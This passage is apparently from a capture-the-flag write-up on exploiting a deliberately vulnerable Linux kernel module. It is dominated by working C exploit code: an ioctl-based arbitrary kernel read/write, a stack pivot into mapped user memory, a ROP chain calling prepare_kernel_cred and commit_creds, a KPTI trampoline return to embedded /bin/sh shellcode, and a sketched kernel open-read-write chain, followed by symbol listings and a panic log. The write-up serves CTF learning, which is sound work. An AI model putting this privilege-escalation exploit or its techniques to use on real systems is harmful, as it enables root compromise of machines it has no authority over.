		perror("ioctl");
		exit(-1);
	}
}

unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;;

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	return value;
}

unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return stack;
}

unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return pgd;
}

int main (int argc, char **argv){
	
	char final[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	// 0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret
	unsigned long mov_rdi_rax = 0xffffffff810cf971;

	// 0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret
	unsigned long cmp = 0xffffffff8147a56e;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;
	unsigned long kpti_trampoline = 0xFFFFFFFF81A00A45;

	int i = 0x1000/8;

	unsigned long *pivot_stack = mmap((void *)0xf7000000-0x1000, 0x1000+0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	void *u_code = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
	if (u_code == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}


	void *u_stack = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN, -1, 0);
	if (u_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	memcpy(u_code, final, sizeof(final));

	/*
	 1. RDI <- 0
	 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 8;
	pivot_stack[i++] = cmp;
	pivot_stack[i++] = mov_rdi_rax;
	pivot_stack[i++] = commit_creds;

	pivot_stack[i++] = kpti_trampoline;
	pivot_stack[i++] = 0x12345678; // RAX
	pivot_stack[i++] = 0x87654321; // RDI
	pivot_stack[i++] = (unsigned long)u_code; //userspace_rip;
	pivot_stack[i++] = 0x33; //userspace_cs;
	pivot_stack[i++] = 0x246; //userspace_rflags;
	pivot_stack[i++] = (unsigned long)u_stack; //userspace_rsp;
	pivot_stack[i++] = 0x2b; //userspace_ss;


	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

One thing very peculiar is how the page table is switched to usermode. By OR'ing 0x1000 to the kernel page table we get the userspace page table. This is very interesting, because it implies that all kernel page tables must have the 12th bit unset, or else the kernel page table and the userspace page table will be the same. If anyone knows why PTI is implemented in cr3 = cr3 | 0x1000, not cr3 = cr3 + 0x1000 please tell me.

I searched some slides, and found this. This image is a good representation of what's going on.

alt text

ROP Fun

In userland ROP, when seccomp was enabled, we wrote an OPEN-READ-WRITE ROP chain. I wondered if something similar to this can be done in kernel space. My plan is to escalate to root, do an Open-Read and write flag to stdout. I know that this kind of act is not so different from our previous feats, but this is just for fun.

First we find the system call handlers for open, read and write via /proc/kallsyms.

/ # cat /proc/kallsyms | grep sys_open
ffffffff8107ac40 W __x32_compat_sys_open_by_handle_at
ffffffff811a20a0 T do_sys_open
ffffffff811a22c0 T __x64_sys_open
ffffffff811a22e0 T __ia32_sys_open
ffffffff811a2300 T __x64_sys_openat
ffffffff811a2320 T __ia32_sys_openat
ffffffff811a2340 T __ia32_compat_sys_open
ffffffff811a2360 T __ia32_compat_sys_openat
ffffffff811ff390 T __x64_sys_open_by_handle_at
ffffffff811ff3b0 T __ia32_sys_open_by_handle_at
ffffffff811ff3d0 T __ia32_compat_sys_open_by_handle_at
ffffffff81216840 t proc_sys_open

Now we look at __x64_sys_open from IDA.

.text:FFFFFFFF811A22C0                 mov     edx, [rdi+68h]
.text:FFFFFFFF811A22C3                 movzx   ecx, word ptr [rdi+60h]
.text:FFFFFFFF811A22C7                 mov     rsi, [rdi+70h]
.text:FFFFFFFF811A22CB                 mov     edi, 0FFFFFF9Ch
.text:FFFFFFFF811A22D0                 or      dh, 80h
.text:FFFFFFFF811A22D3                 jmp     sub_FFFFFFFF811A20A0

It seems that the arguments are set properly from the user stack and do_sys_open (0xFFFFFFFF811A20A0) is called. So in order to make an open system call, we need to do do_sys_open(0xFFFFFF9C, arg1, arg2, arg3).

I speculated that the rest should be the same, for READ/WRITE. Actually this observation was made on CHMOD in ret2usr tutorial.

I look at __x64_sys_read (0xffffffff811a5780) on IDA and it shows a similar pattern, except for the fact that the first argument is not hard-wired to 0xFFFFFF9C.

.text:FFFFFFFF811A5780                 mov     rdx, [rdi+60h]
.text:FFFFFFFF811A5784                 mov     rsi, [rdi+68h]
.text:FFFFFFFF811A5788                 mov     rdi, [rdi+70h]
.text:FFFFFFFF811A578C                 jmp     loc_FFFFFFFF811A56D0

I also peek at __x64_sys_write (0xffffffff811a5860) and it's exactly the same.

.text:FFFFFFFF811A5860                 mov     rdx, [rdi+60h]
.text:FFFFFFFF811A5864                 mov     rsi, [rdi+68h]
.text:FFFFFFFF811A5868                 mov     rdi, [rdi+70h]
.text:FFFFFFFF811A586C                 jmp     sub_FFFFFFFF811A57B0

Actually I found out that 0xFFFFFFFF811A56D0 is ksys_read and 0xFFFFFFFF811A57B0 is ksys_write respectively, by inspecting /proc/kallsyms a bit more. So our exploit should do

0. escalate to root via commit_cred(prepare_kernel_creds(0))
1. ksys_read(do_sys_open(0xFFFFFF9C, "flag", 0), userbuf, 0x100)
2. ksys_write(1, userbuf, 0x100)
3. msleep(0x10000)

The result is

/ $ /home/ctf/runme
[   15.198738] ------------[ cut here ]------------
[   15.199394] do_IRQ(): runme has overflown the kernel stack (cur:ffffc900000cc000,sp:f6ffff10,irq stk top-bottom:ffff888003600080-ffff888003604000,exception stk top-bottom:fffffe000000a080-fffffe000000c000,ip:_raw_spin_unlock_irqrestore+0x5/0x10)
[   15.200365] WARNING: CPU: 0 PID: 1035 at arch/x86/kernel/irq_64.c:73 handle_irq+0xfd/0x110
[   15.200751] Modules linked in: vuln(PO)
[   15.201263] CPU: 0 PID: 1035 Comm: runme Tainted: P           O      4.19.76 #1
[   15.201567] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[   15.201844] RIP: 0010:handle_irq+0xfd/0x110
[   15.202068] Code: 00 00 50 65 4c 8b 14 25 40 4d 01 00 57 49 81 c2 28 06 00 00 48 c7 c7 b8 86 fb 81 4c 89 d6 c6 05 13 19 30 01 01 e8 63 dd 03 00 <0f> 0b 48 83 c4 18 e9 77 ff ff ff 90 90 90 90 90 90 90 90 83 ff 02
[   15.202576] RSP: 0018:ffff888003603fa0 EFLAGS: 00000086
[   15.202741] RAX: 00000000000000e9 RBX: ffff888003036000 RCX: ffffffff82247018
[   15.202923] RDX: 0000000000000001 RSI: 0000000000000082 RDI: ffffffff828c092c
[   15.203136] RBP: 0000000000000027 R08: 303178302f357830 R09: 29303178302f3578
[   15.203356] R10: ffff888003327468 R11: 2b65726f74736572 R12: 00000000f6fffe68
[   15.203635] R13: 0000000000000027 R14: 0000000000000000 R15: 0000000000000000
[   15.203909] FS:  0000555556d72880(0000) GS:ffff888003600000(0000) knlGS:0000000000000000
[   15.204261] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   15.204433] CR2: 00000000f7000000 CR3: 0000000002b9a000 CR4: 00000000001006f0
[   15.204660] Call Trace:
[   15.205068]  <IRQ>
[   15.205294]  ? _raw_spin_unlock_irqrestore+0x5/0x10
[   15.205468]  do_IRQ+0x3c/0xd0
[   15.205572]  common_interrupt+0xf/0xf
[   15.205802] WARNING: can't dereference registers at (____ptrval____) for ip common_interrupt+0xf/0xf
[   15.205877]  </IRQ>
[   15.206210] ---[ end trace 55b0043343db98e4 ]---
this is an example flag

After the panic, we see the flag. I don't know why the kernel panics, but it's kinda weird for it to not panic as well...

You can’t perform that action at this time.